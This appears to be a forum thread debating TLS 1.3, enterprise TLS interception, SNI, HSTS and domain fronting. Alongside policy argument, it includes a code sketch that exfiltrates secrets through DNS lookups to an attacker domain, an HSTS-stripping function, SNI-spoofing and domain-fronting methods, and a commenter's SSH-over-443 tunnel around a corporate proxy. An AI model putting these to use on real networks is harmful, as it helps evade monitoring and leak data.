There is a difference between an unauthorized party intercepting TLS communication, and a party you have authorized to do so.
Let's say I am a private person and am trying to access my bank account through a TLS connection. I am connected via WiFi to my cafe. I have not authorized the cafe, its uplink provider, nor any of the other network operators between me and the bank to intercept my traffic. It should be impossible to do so.
Let's say I am an employee of a financial institution. This company, in order to comply with record-keeping laws, needs to log all network connections. One of the conditions of my employment is that I authorize the company to intercept my network communications. The proxies within my company should be able to intercept my communications. However, no network operator outside of the company I work for, and to which I have given consent to intercept my traffic, should be able to intercept the communications.
The real world presents situations that are more nuanced than "encrypt everything and don't let anyone between me and the destination see what is going on." There are many places where the above is the desired and sensible requirement. There are also many use cases where crypto is warranted, but select parties should have the ability to break it.
How this should happen remains to be seen. In the examples I have given above, "consent" will have to take the form of both an actual agreement and some crypto key that will allow the privileged proxies to intercept my traffic.
What TLS 1.3 does appear to do is make it harder to optimize this proxying, and make it impossible to be selective about what you proxy.
However, both such optimizations and selective proxying are apparently hard to implement securely.
Now, selective proxying is nice to have.
It is better if enterprises don't intercept traffic to banks or social networks. However, it seems to me like Facebook would be a nice side channel for exfiltrating data.
It seems to me that selective proxying could still be solved at the DNS level. Make any domain except the whitelisted ones resolve to a proxy, and then have the proxy sit in the middle of all traffic.
This means you also proxy all unencrypted traffic to the outside world, but if you are proxying TLS, you probably want to block or proxy plaintext outbound connections as well.
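A minimal sketch of that DNS-level policy, assuming a dict-backed resolver; all domain names, the `ALLOWLIST` contents, and the proxy address here are hypothetical:

```python
# Whitelisted domains (and their subdomains) resolve normally; everything
# else resolves to the interception proxy, which then sits in the middle
# of all remaining traffic.

ALLOWLIST = {"bankofamerica.com", "facebook.com"}  # hypothetical whitelist
PROXY_IP = "10.0.0.2"                              # hypothetical proxy address

def policy_resolve(domain, real_resolve):
    """Return the real address for whitelisted names, the proxy otherwise."""
    name = domain.lower().rstrip(".")
    allowed = name in ALLOWLIST or any(
        name.endswith("." + d) for d in ALLOWLIST
    )
    return real_resolve(name) if allowed else PROXY_IP

# Stub resolver standing in for real DNS:
fake_dns = {"facebook.com": "157.240.0.1", "evil.example": "203.0.113.9"}
print(policy_resolve("facebook.com", fake_dns.get))  # resolves normally
print(policy_resolve("evil.example", fake_dns.get))  # redirected to the proxy
```

A real deployment would hang this policy off the resolver your DHCP hands out, and block direct-to-IP egress at the firewall so clients can't simply bypass DNS.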
You have the Server Name Indication (SNI) in the ClientHello, so selective proxying is very easy to implement with TLS 1.3. SNI wasn't mandatory in older versions, which is why middleboxes went for this "let's inspect the certificate" dance in the first place.
Thus, a proxy using SNI to identify the host would be circumvented by using facebook.com or www.bankofamerica.com as the name in SNI and just ignoring SNI at the malicious endpoint.
As TLS 1.3 encrypts the certificate, you can't check the certificate without actually MitMing the connection. Thus, whitelisting isn't possible in TLS 1.3. Unless you trust the (attacker controlled) SNI, at which point, why even do TLS proxying.
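That SNI travels in the clear is easy to verify locally, with no network traffic at all, using nothing but the stdlib `ssl` module: write a ClientHello into a memory BIO and look for the hostname bytes. This is just an illustrative check, not proxy code:

```python
# Capture the bytes a TLS client would send first, and confirm the
# requested hostname appears in them unencrypted (the SNI extension).
import ssl

def client_hello_bytes(hostname: str) -> bytes:
    ctx = ssl.create_default_context()
    incoming, outgoing = ssl.MemoryBIO(), ssl.MemoryBIO()
    tls = ctx.wrap_bio(incoming, outgoing, server_hostname=hostname)
    try:
        tls.do_handshake()   # cannot complete: there is no peer
    except ssl.SSLWantReadError:
        pass                 # but the ClientHello has been written out
    return outgoing.read()

hello = client_hello_bytes("www.bankofamerica.com")
assert hello[0] == 0x16                         # TLS handshake record
assert b"www.bankofamerica.com" in hello        # SNI visible to any middlebox
```

This is exactly what makes SNI-based filtering cheap for a middlebox, and exactly what makes it spoofable: the client writes whatever name it likes into that field.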
Note that according to the article, many TLS 1.2 proxies don't actually verify the certificate by default, which means my masquerade-as-facebook.com ploy would also work against them. It can be pulled off by simply using a false 'common name' field in the cert.
The defense against this is easy: it is the certificate validation all browsers do. Apparently, these middleboxes by default do not use this validation.
This is generally seen as a compelling argument against the deployment of TLS proxies. The argument being that they are 'security theater' as opposed to actual security, on account of them being easy to spoof.
There is a simpler solution to let users still access the Web: let them do so unencrypted. They won't have the "Secure" symbol on their browser, which is extremely reasonable considering that, indeed, their access is not really secure: their employer can read all communications.
The employer simply sets up a proxy that receives unencrypted communications and encrypts them on the fly; a TLS/HTTP client.
The bigger issue is HSTS; the proxy can remove the header, but if the origin comes preloaded in the browser, that won't do, which means the browser would need to be customized to not have or enforce HSTS.
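The header rewrite such a gateway would perform is trivial; here is a sketch (the function name and header dict are illustrative, not any particular proxy's API). It forwards the upstream response but drops Strict-Transport-Security, so the browser never learns to insist on HTTPS, though, as noted, browser-preloaded HSTS entries defeat this:

```python
# Drop the HSTS header from an upstream HTTPS response before relaying
# it to the client over plaintext HTTP.

def strip_hsts(headers: dict) -> dict:
    return {
        name: value
        for name, value in headers.items()
        if name.lower() != "strict-transport-security"
    }

upstream = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}
assert "Strict-Transport-Security" not in strip_hsts(upstream)
```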
This needs to be reconciled with the conflicting requirement to log, record, and/or block connections based on content.
Perhaps TLS 1.3 is not the solution here, as it cannot reconcile this conflict. Perhaps something else needs to be developed that will provide a solution meeting both requirements.
Furthermore, as most large companies install these, won't malware authors just start proxying C&C traffic over SSH on port 80? Or use other non-interceptable secure channels?
I thought most of these compliance frameworks don't really specify how; just compile, archive, and produce the data periodically (or on demand), make the system tamper-proof (or tamper-evident), and get it audited from time to time.
If there is something to reconcile, the bug is in the law and should be fixed there.
Failure to do so will get you heavily fined and get your license to do business revoked. Also, you can't talk about it to the public.
I have friends and family in at least three countries who are involved in this industry and have confirmed to me that this is routine: log sharing, port mirroring, and putting black boxes in the middle of your core network are just routine work and have been for many years.
Perhaps such countries will outlaw TLS 1.3. Who knows. The US did outlaw strong encryption at one point because it denied the government access to data it wanted.
Does that mean they also need to intercept communications from your phone to the internet when you're at work?
So one institution has legal requirements that break users' rights, and therefore we must change the internet for them?
In this sense, corporate users truly are different from private users. Similarly, company e-mail is not confidential. A very important requirement to this treatment of corporate users is that the end user ought to be made aware of this. Both with the company e-mail and the proxied company computer.
Part of the issue here is that sometimes encryption is bad. I for one dread the day I'll have to install some binary blob that communicates using TLS with a pinned cert I cannot override.
Similarly, encryption and secure hardware modules are what enable boot-locked devices.
The point being, cryptography can be used to take away control. Not just from big institutions but also from end users.
If we admit that sometimes cryptography is bad, there might be cases where we want a controlled way to break it. Again, this should be done with notice and all responsibilities lying with those taking the risk. That is, the party responsible for securing the proxy is also the party that is screwed when the proxy is compromised.
This might sound like encouraging key escrow for government access. It definitely is not. The issue there is notice (or choice, if non-escrow becomes outlawed) and the fact that a compromised system hurts end users, not the government. Thus, the incentives are misaligned for the government.
I'm not sure I follow, so because HSTS is a disaster then encryption is bad and we should switch to no encryption?
Then, I propose we should also take issue with encryption that prevents TLS proxying in corporate settings.
These institutions can just block TLS 1.3 connections at the firewall. Where is the problem?
TLS and encryption aren't going anywhere, and they're not always going to wait around for a consensus from industry. The sobering truth is that if not now, then in a decade or so the companies shilling TLS/SSL interception appliances and software will need to shift focus, as the protocol will likely have been evolved by force over time to meet the needs of increasingly prevalent surveillance states. TLS interception or "proxying" started out as a graduate student's parlour trick and eventually evolved into an entire shady industry where players like Bluecoat are routinely caught selling their products and services to repressive regimes.
Here's hoping LibreSSL delivers the goods, with or without the marketing team's say.
Frankly, I have a higher duty than user privacy. My users have access to data that's critically sensitive in various ways, in some cases they face criminal sanction. I need to both control and detect unauthorized software on the network and ensure that users are following the rules.
More extreme privacy activists will make noises about using endpoint-based solutions or something similar. It's a bullshit position that will ultimately weaken security.
In the latter case ideally (and possibly legally required) you'd have acceptance of potential interception a condition of employment.
And that's the thing. There is nothing stopping those companies from analyzing the data once it reaches a managed computer. It is just that they want the capacity to do that on computers they don't manage.
You cannot get out of the network unless the traffic is proxied. There are a few exceptions for identity-based reverse proxies that companies like Google talk about. But most places aren't there yet for sensitive applications outside of collaboration.
There's also the matter of trust. Some business partners are explicitly trusted, either by a private CA signed certificate or by a specific third party key that is independently validated.
Public networks are completely different. I am not talking about an ISP here.
That said, your use-case of intercepting secure connections in your private network is a solved one: set up a private CA.
Wanting to weaken the security of TLS for everyone else for what amounts to your own convenience is very selfish.
Unfortunately (?) some companies are actively working against IT administrators' (and in my case, parents') ability to inspect TLS traffic on their networks - Google being a big one, with the recent release of Android Nougat requiring apps to opt in to allowing user/admin-installed CAs to be honored. User privacy is important, but if you're using a company-issued phone or allow their MDM to deploy a CA to the trust store on your own phone, you should know what you are signing up for. Google Chrome pins the certificates for Google-owned sites as well, so even if your private CA is installed in the system trust store it will flat out refuse to load google.com, etc.
A whitelist would be safer, but it's not worth the headache - we use blacklisting to try to prevent accidents for brief periods when we can't supervise her access, instead of falsely thinking it eliminates the need for supervision entirely.
Regardless, you still need TLS inspection either way - even pbskids.org is served over HTTPS these days.
Sounds like it could be a worthy venture. Make this software run on dd-wrt or whatever, then sell people wifi routers with it preloaded so that they can just plug them into their existing routers with ethernet, and voila, they have a kid-friendly separate wifi.
I could, but it's a lot more work than just installing Sophos XG on a used server and enabling filtering for certain users. I could also show my wife how to use the admin interface and add additional sites to the whitelist, but there's still the issue of CDNs and such that make life difficult.
> Sounds like it could be a worthy venture. Make this software run on dd-wrt or whatever, then sell people wifi routers with it preloaded so that they can just plug them into their existing routers with ethernet, and voila, they have a kid-friendly separate wifi.
Some companies already sell content filtering devices that sit somewhere on your home network. I'm not a fan of them because they usually require you to install some client on your devices or use a captive portal for authentication. Some also have a monthly/annual subscription, and for those that don't, I worry how they can even afford to keep the list up to date once they get out of the growth stage (or I'm out $$$ for the hardware if they fail to exit it at all).
I realize my setup at home isn't for your average user, but one huge advantage I have that nets it a high Wife/Spouse Acceptance Factor is authentication to my firewall is done through RADIUS accounting packets and I already have AD deployed at home. The moment you login to my network the wireless access point or switch (if wired connection) tells the firewall what user is assigned to a specific IP address, so my wife just signs in with her AD credentials on her iPhone/surface pro/etc. and the firewall already knows to let all her traffic through, if my daughter signs in on her computer/iPhone (she has my old 6+ to play games on) traffic is immediately filtered.
Also, do you know of any way to filter YouTube (other than outright blocking it)? E.g. only allowing content from a whitelist of channels? YouTube Kids isn't really effective, unfortunately.
A root CA that has been installed by the computer administrator is assumed to be more trustworthy than the one installed by your OS.
I've worked in these places and I won't work for them. It places trust in my employer and other employees (most of whom I will never meet) that I'm not willing to give. Sure, you can tell me that certain sites aren't intercepted, and I can tell that from the origin of a certificate, but many employees can't and don't understand any of this.
If your data is really so sensitive, set up an airgap. There are other ways of securing a corporate network that don't involve a 'just in case' dragnet.
Ditto, but my solution is to just not log into any important/private/nonpublic stuff on employer networks. There's plenty of other non-proxy stuff an employer can install that I also don't trust, and won't necessarily detect, so this seems like a good general policy, irrespective of my employer/coworkers. And if I'm going to be taking that "assume I have no privacy" security stance anyway... them being up front about one of the technologies they're using to secure stuff is, if anything, a good sign.
I've got a non-MITMed cellular connection on my own hardware in my pocket if I'm really hard up for a private connection. I do draw a line at the point where anyone wants to install anything on my own devices. I've temporarily allowed it exactly once - with the device not leaving my sight, and with it being reformatted by myself both before joining it to the work network, and then again before joining it to my home network (although given the potential for firmware malware / IME type stuff, perhaps that's still not cautious enough.)
> If your data is really so sensitive, set up an airgap.
Been there. And I'm paranoid enough to be half tempted to set one up at home. They're a PITA for some workflows though - e.g. needing to play a game of telephone for SDK updates. And then you still can't browse Facebook or whatever with your corporate network. Intercepting traffic instead of completely blocking it is a convenience/security tradeoff.
> but many employees can't and don't understand any of this.
This is admittedly a problem. And they still won't even when the IT department says "we've basically installed our own malware onto 'your' computers / our network, maybe don't log into your bank account from work, we're already going to be feeling terrible and losing sleep if/when our security appliance gets pwned."
So maybe it'd be a good idea ethically and exposure-wise to block facebook/google services/banks if you're going to MITM despite potentially pissing off those who are fine with trusting their employers/coworkers. But I'm relatively OK with a well communicated and disclosed TLS proxy for work networks.
And on that basis, you're prepared to throw such a tantrum as to hold up completion and adoption of a crucial cornerstone of protection for people who actually need privacy?
Interception of web traffic stops those threats.
Nobody is throwing a tantrum or compromising a cornerstone of security. You don't really understand the full scope of what you are talking about -- the "cornerstone of privacy" you speak of really means placing ultimate trust in every random web service.
TLS and the root trust problems associated with it are bad enough. Preventing users from making choices about who and what they trust makes those problems dramatically worse.
No, but you stop that by refusing to let the printer talk out of your network at all.
> Or notes used by a police investigator while researching an unsubstantiated or even false accusation leaking thanks to some drive-by malware?
That's where on-host monitoring can protect you. It'll also protect you in case that computer can ever connect to any other network.
That's a lost battle, honestly. If you block traffic from the printer to the internet, it starts sending UDP with faked source addresses.
If you deploy a VLAN, the printer can fake the VLAN tags. If you physically separate the printer from any direct connection to your firewall, the printer can look for anything on the network it can use to bounce traffic off (like a DNS server or a computer accepting ICMP echo requests).
A sufficiently dedicated attacker can and will extract information through covert channels.
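As one concrete illustration of how little a covert channel needs, here is a sketch of smuggling data out through ordinary DNS lookups; any resolver the compromised device can reach will forward the query toward the exfiltration domain's authoritative server. The domain name and chunk size are hypothetical:

```python
# Encode a secret into DNS labels under an attacker-controlled domain.
# Looking up the resulting name leaks the secret to whoever runs the
# authoritative server for that domain, even through a forwarding resolver.
import base64

def exfil_labels(secret: bytes, domain: str = "attacker.example") -> str:
    payload = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [payload[i:i + 50] for i in range(0, len(payload), 50)]
    return ".".join(chunks + [domain])

print(exfil_labels(b"hi"))  # a perfectly ordinary-looking DNS name
```

This is why "just block the printer's outbound traffic" is harder than it sounds: you would also have to proxy or monitor DNS itself.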
Whatever happens with TLS 1.3, obviously the looming idiocy of the CA system is a larger problem. And yes, you're right, trusting random web services (i.e., the other endpoint) is often a mistake.
But at the end of the day, the users that need to be served by TLS are the endpoints, not the proxy operators.
(FWIW, I suspect that TLS as we know it will shift fairly radically anyway as distributed applications become more prominent).
Do you ever go through your proxy logs and when was the last time you actually found something suspicious?
Even very sophisticated large tech companies don't epoxy the USB ports on their employees' MacBooks.
// EDIT: They also cover their asses with some 'network use policy' that is the vaguest possible thing, and even most software engineers don't understand the full extent of what is done. It's pretty disgusting, and I can't wait until some combination of GDPR-style informed consent and what is law in Austria is put into employment law.
The place I work does this - and it's a constant PITA that gets in the way of me doing my job. But I think if you have a system to put exceptions in place, and it doesn't take 47 weeks of email ping-pong with 18 different managers, then it's fine.
Unfortunately, where I work is a bureaucratic nightmare.
But it's easily gotten around - I have a cloud-hosted VM (paid for by company MSDN!) that runs SSH on port 443, so the HTTP proxy will let me through to set up a tunnel through which I can access anything using SOCKS.
I think assuming you can control any packets that pass through a network ends up being a losing proposition. Why not use things like VPNs to ensure that traffic to sensitive internal services is controlled? Failing that, install software on users' computers and don't allow them to use any non-work internet resources.
That's all well and good, but you don't need to do it from your desk at a regulated financial institution.
>I think assuming you can control any packets that pass through a network ends up being a losing proposition.
This is a very strange statement. All security is always a losing proposition. The best anyone can ever hope for is raising the bar of cost and sophistication an attacker will have to surmount to be successful, but you're still very much obligated (legally, and ethically) to do that. If you possess sensitive data, you need to take steps to detect and prevent exfiltration. If you have employees (such as registered broker-dealers) whose conversations with the outside must be monitored and retained under the law, you need to make sure they're using only the properly configured communication channels.
>Why not use things like VPNs to ensure that traffic to sensitive internal services is controlled
Because TLS interception is about preventing unwanted egress/exfiltration from the (relatively) trusted zone of a corporate network.
>Failing that, install software on users' computers and don't allow them to use any non-work internet resources.
Installing the corporate CA on managed endpoints is a prerequisite for TLS interception. The problem VPNs solve has nothing to do with this.
Just ask the users of your network to install your CA cert (or click past your cert warnings). That should work with TLS 1.3 right?
Or in your statement are you really meaning, "I should absolutely be able to intercept TLS traffic on my computers on my network without them knowing about it"? If so, that's a completely different thing altogether and if that's what you and the GCHQ mean when talking about proxying, it needs to be explicitly stated. There is a huge difference.
Perhaps the security agencies view their country as "my network", and then if you read the rest of the quote, everything follows from there.
There are big differences: the coercive power of government, and the necessity of civil rights and peacefully organizing against the government; compared with the 'at will' relationship with a company and its interest, generally considered legitimate, in ultimate authority and in stopping insubordination.
On the other hand, large companies are not really 'at will'; people can't just walk away from jobs 'at will', especially when they have children, mortgages, other debts, or (in the U.S.) health problems. Also, some insubordination is legitimate: Labor organizing, legal and regulatory complaints (EEOC, safety, etc.), and probably other things I'm not thinking of.
The distinction isn't so clear cut. I'm not sure the objection of the corporate sysadmin is that much more valid than the government security agency. Also, the security agency often has far more at stake.
Intercept the traffic on your machines, if that's a legal requirement.
Intercepting that data would be a HIPAA violation; how do you avoid that?
So feel free to have insecure communication provided you control all devices on the network. It will still be insecure.
I definitely do not want to see a weaker TLS - 1.3 is great. At the same time, I do not want to have 'security improvements' that make it impossible for average developers to see their own device's traffic. That will ultimately enable insecure APIs and gross privacy violations behind TLS.
If you've lost that control you have nobody to blame but yourself. There are devices and operating systems on the market that do not require you to give up that control. If you choose to buy a device you can't root and an OS you can't modify, that's all on you.
This is where Libre/Open Source software comes in, and why it plays a vital role in creating an ethical connection between people and software. There is literally no other way around this. Open code, secure transmission, harsh accountability for violations.
If you don't actually control the box, it can do whatever it pleases. It doesn't need an IETF Standards Track RFC, it can just choose to do it and you can't stop it.
Especially when it goes as far as encoding the philosophy that state actors are the only problem that matters into the very protocol.
Are you saying the protocol will be easier or harder to intercept in the future?
Open lobbying against crypto from the spooks, in the name of collective security, is of course not a new thing - but dressing it as necessary for "enterprise security" in standards lobbying is a clever move.
But what bothers me, is I keep asking myself the question: When and why did we decide to give the proxy all the power in this relationship?
If we have to use proxies, at least the proxy should be transparent about itself to all parties on the connection. Then my bank can drop the connection or restrict functions/data to non-proxied data, secure government servers can drop the connection, my browser can drop the connection and give me an error (because I don't want anyone snooping on my banking history), etc.
Eg. Let's say I open the patient portal for my hospital through a proxy. Is the proxy software HIPAA compliant? What about the people that have access to my health data through the proxy software? In this case, I would think we should allow the portal software to drop the connection because the connection itself is not secure.
It sounds like what you want is the server authenticating the client. That already exists in TLS: it's called a client certificate (complementing the usual server certificate, which authenticates the server to the client).
Unless the MITM proxy has access to the client certificate's private key, or the server trusts the MITM proxy's CA, the proxy cannot impersonate the client.
I doubt it. AFAIK the web browsers’ UI for handling client certificates is way too cumbersome for mainstream usage.
In TLS 1.2 you could only express a list of CAs whose signatures you trust (this is one of the most widely misconfigured settings in OpenSSL-based software, telling OpenSSL you _trust_ some CA to identify clients when actually you meant to say your server certificate is _signed_ by that CA)
In TLS 1.3 you can write out arbitrary constraints, although somebody will need to define any new ones in a separate ID or RFC. So this might simplify the end user experience down the road because the browser can do enough matching to just hand over the correct certificate automatically.
Or it might never get used on the public Internet, oh well.
If the server detects an insecure connection, then at least the minimum is that the user is informed.
It's more important to have good viable security rather than "my middleboxes". To me, it's like the FBI asking for NOBUS crypto.
The Internet is nothing special in this respect, large companies struggle to make policies that cover all the bases without strangling themselves and they will err on both sides of the line, sometimes learning from their mistakes and sometimes not so much.
Lots of corporate networks probably should be locked down to that extent. If they can't set up their own CA they're probably not doing a great job protecting their customers' private information.
How do you think Google found out Levandowski was stealing blueprints? Definitely not by meddling between TLS endpoints.
It would be really helpful, though, if there were an operating mode wherein one could instruct the proxy to talk to an HTTPS server without using CONNECT. So the browser talks to the proxy over TLS, and displays the proxy's certificate details, possibly with a big red warning, and the proxy terminates that TLS connection, decides what to do based on the request, makes a new onwards connection and gets the response plaintext too.
The user obviously loses some privacy guarantees here, but no more than with an intercepting "transparent" proxy, and it's much clearer what's actually happening and which devices the user needs to trust. I'm much happier with an explicit proxy than any attempts at a transparent proxy that I've encountered, not least because it makes it possible for the browser to be clear to the user about what's happening.
[SNI is there to make "virtual hosting" possible for HTTPS, which is why you can get working SSL on a cheap bulk host without paying them extra for a dedicated IP address]
So, a middlebox might choose to drop connections based on the name your client sends (and of course it could also choose to drop them based on the destination IP address, the amount of traffic you've sent recently, or the phase of the moon). But the certificate itself is now always encrypted, so the middlebox can't snoop that without acting as a proxy.
It sounds as though you've (perhaps against your will) accepted the proxy, so in that case all bets are off anyway, a proxy can do whatever it likes, if you don't want that don't trust proxies.
AIUI, it's slightly better than this, because you only actually need to send the name of some domain that the server can serve, not necessarily the one you actually want to talk to. If the domain is on CloudFront, App Engine, Heroku, etc., that means you can choose one of a billion innocuous sites to use for SNI before connecting to the one you actually want.
This is called 'domain fronting'.
I can't quite work out the trust algebra of this, though. You don't have any cryptographic guarantee that you're connecting to the right site. But you can be sure that you're connecting to whichever server hosts the site whose name you're taking in vain. But if that server was able to serve your site all along, because it had its private key, did you ever really have any guarantee?
Probably won't help for wikipedia, though, as they're not behind a CDN.
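The split described above can be sketched in a few lines; every name here is hypothetical and nothing below actually makes a connection. The point is which name goes where: the SNI (visible to snoopers) carries the innocuous front, while the Host header (inside the encrypted stream) carries the real target:

```python
# Build the two pieces of a fronted request: the hostname announced in
# cleartext via SNI, and the HTTP request (with the real Host) that only
# exists inside the encrypted channel.

def build_fronted_request(front_sni: str, real_host: str, path: str = "/"):
    http_request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {real_host}\r\n"     # only visible after decryption
        f"Connection: close\r\n\r\n"
    )
    return front_sni, http_request   # front_sni is all a snooper sees

sni, req = build_fronted_request("innocuous-cat-blog.example", "blocked.example")
assert sni == "innocuous-cat-blog.example"
assert "Host: blocked.example" in req
```

This only works when both names are served by the same infrastructure (a shared CDN or PaaS), which is exactly the trust-algebra wrinkle discussed above.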
Is the client allowed to not send an SNI? If not, does this mean that HTTPS servers will no longer have a "default" HTTPS virtual host if accepting only TLSv1.3 connections?
If you don't get to know anything about the backend at an IP until you've essentially proven you have a shared secret (the domain name), this could be a bad time for the folks who try to scan IP address space for HTTPS sites (e.g. the DDoSers who want to de-anonymize Cloudflare-protected backends in order to attack them directly.)
Anyway, it is unlikely that TLS 1.3 will be popular enough to reject TLS 1.2 connections in the next say, five years unless there's some monumental security problem that makes TLS 1.2 moot.
Of course it's usually even simpler than that because you can just look at DNS lookups which overwhelmingly don't use transport-level encryption today.
The DNS community is now trying to move to DNS over TLS. Once that is widespread, there is hope that a future TLS version will encrypt SNI.
Note that if you do DH before sending the SNI then it requires an active attack to figure out the SNI. However that will make life very difficult for server-side proxies that try to route traffic based on SNI.
TLS 1.3 provides 1RTT encryption by having clients speculate that the server is modern. The client opens by saying "OK, I assume you know how to do this key exchange and here are my parameters". If the server actually does _not_ know the flavour of key exchange proposed, it sends a retry message, explaining what it does know instead and we're immediately paying an extra round trip cost.
SNI travels in that first message from the client, but if we are to encrypt it with the DH key we can't send it until the client knows that key, which means we again pay an extra round trip.
You might think hold on, surely we can immediately start our transaction because we have the encryption keys now, so we're not paying an extra round trip. Nope, we mustn't start the transaction until we've seen the server's certificate, so we have to wait an entire extra round trip.
The best option if we want to really encrypt SNI is to have servers able to choose to go early, so you'd connect without SNI, and then after finishing DH the server could choose to either immediately send certificates (so it can't serve different sites this way) or ask for the encrypted SNI first. This would mean it's 1RTT for www.google.com and 2RTT for another-cat-blog.example because the latter is on a cheap bulk host. That's... not great.
A way forward that's resistant to attack but isn't full encryption would be the use of hashing: the client specifies only a hash of the hostname, not the plain name, and the server matches this against its known list of possible names. A snooper sees the hash and can try to guess what it means, but if they have no idea, they're out of luck.
We can make the snooper's life hard either in the protocol design itself (e.g. send password-style salted & pessimised hashes, so both the server and snoopers must recalculate for each connection) or in our naming (e.g. name the members only web site zqdm-48gb.example.com, not members.example.com) but this is far less comprehensive than full encryption.
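The salted variant can be sketched as follows. This is not part of any actual TLS specification, just an illustration of the mechanism: the client sends a fresh salt plus hash(salt || name), the server recomputes that hash for each name it can serve, and a snooper must brute-force candidate names anew for every connection:

```python
# Per-connection salted hashing of the requested hostname.
import hashlib
import os

def hashed_sni(name: str, salt: bytes) -> bytes:
    return hashlib.sha256(salt + name.lower().encode()).digest()

def server_match(hashed: bytes, salt: bytes, served_names):
    """Trial-hash each servable name until one matches, or give up."""
    for name in served_names:
        if hashed_sni(name, salt) == hashed:
            return name
    return None

salt = os.urandom(16)                      # chosen fresh by the client
probe = hashed_sni("members.example.com", salt)
served = ["www.example.com", "members.example.com"]
assert server_match(probe, salt, served) == "members.example.com"
```

Note the cost asymmetry this creates: the server does one hash per servable name per connection, while a snooper with no candidate list gets nothing, and a snooper with a dictionary of likely names must redo the whole dictionary for every connection.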
It is nice to have 1RTT, but if at the same time you are leaking SNI, people are not going to be happy.
I'm curious how this hashing would work out. My gut feeling is that some security researcher will have a nice presentation along the lines of "nice hash function you have, here's how to break it".
* It is common to pin a certificate for which you don't have the corresponding private key, and so you would not be able to decrypt the message. Examples: pinning an intermediate from a CA you use, or their root, or pinning a "backup" key that you keep on paper just in case but that isn't live.
* Pinning is a serious foot-gun and a hostage risk (bad guys take over your site for one day; it seems normal, but it pins _their_ key; then they tell you to pay them $1M for the key or else, and your users are locked out until you pay), so it is being deprecated for the public Web.
* Which key? The whole point of SNI is that we tell the remote server which site we're interested in, and then it chooses the keys and certificate accordingly. So with your approach the server must use trial-and-error to eliminate all the keys that don't work first. It barely matters what's actually inside the SNI message: if you can decrypt it, then you've already found the right site...
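That trial-and-error chicken-and-egg can be illustrated with a toy model (my own sketch; HMAC tags stand in for real AEAD authentication, and nothing here is actual TLS):

```python
import hashlib
import hmac
import os

# Toy illustration of the problem above: if the SNI were encrypted
# under a per-site key, the server would have to trial-verify with
# every site's key, and whichever key authenticates has already
# identified the site, making the SNI payload itself redundant.

site_keys = {name: os.urandom(32) for name in ("a.example", "b.example")}

def seal(key: bytes, msg: bytes):
    """Client side: attach an authentication tag under one site's key."""
    return msg, hmac.new(key, msg, hashlib.sha256).digest()

def trial_open(msg: bytes, tag: bytes):
    """Server side: try every site's key until one authenticates."""
    for name, key in site_keys.items():
        if hmac.compare_digest(hmac.new(key, msg, hashlib.sha256).digest(), tag):
            return name  # the key that verifies already names the site
    return None

msg, tag = seal(site_keys["b.example"], b"sni=b.example")
assert trial_open(msg, tag) == "b.example"
```

With thousands of virtual hosts on one server, that loop is exactly the cost the parent comment is objecting to.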
Sure, most servers won't be able to take advantage of this. But if your server is using TLS only to speak to your reverse-proxy over the public Internet (e.g. if you're operating a Cloudflare-protected site where the TLS is terminated at Cloudflare and then a separate TLS connection is made from Cloudflare to your backend), you might be able to take full advantage of this as soon as your reverse-proxy's client logic supports TLSv1.3.
At least for those that are stuck on IPv4, which is unfortunately a majority.
And the best part: when the Russians were blocking a blogger's web site by IP, he switched his domain to a bank's IP address, and so the bank's IP was blocked automatically :)
To clarify: the blogger set his domain to point to the bank's IP address. The automated domain blocking system resolved his domain and blocked "its IP" without confirming that the IP actually belonged to the targeted site.
"The heuristics are necessarily imprecise because TLS extensions can change anything about a connection after the ClientHello and some additions to TLS have memorably broken them, leading to confused proxies cutting enterprises off from the internet."
Can someone elaborate on a specific instance of this where a TLS extension led to breakage? I don't doubt the author, quite the opposite - I'm interested in reading more about the specifics of it.
I have no actionable feedback from the parallels, just fascination.
TLS 1.3 client libraries could then optionally support interceptable key exchange depending on who is using them. An individual can use a normal OS and distro that exclude the insecure features, while banks and military facilities might turn them on.
Alternatively, why the "one size fits all" approach? Why not have a "TLS-commercial"? Obviously "one size fits all" requires a compromise by all parties, resulting in a collective reduction of security.
That sounds like the "draft-rehired" proposal. Here's a list of arguments against it (and similar proposals): https://github.com/sftcd/tinfoil
By ensuring that HTTPS is used everywhere, and that no other security regimes are allowed, they've killed proxies for all uses except spying on users. The end result is some of the Internet is now less private, by design.
If you think proxies are a useful tool to save bandwidth, decrease latency and reduce load, and want to stay secure, but not necessarily private, there are very obvious ways this can be done. But there are people literally fighting against this because they want privacy or nothing.
This is Internet puritanism.
There is plenty of client software that can be configured to use proxies. Also no problem there.
Where it goes wrong is transparent proxies (also called 'middleboxes') that operate without consent of the endpoints. In general, those proxies have caused so many network problems that most people involved in the IETF will happily see them die.
And the easiest way to do that is to encrypt all traffic.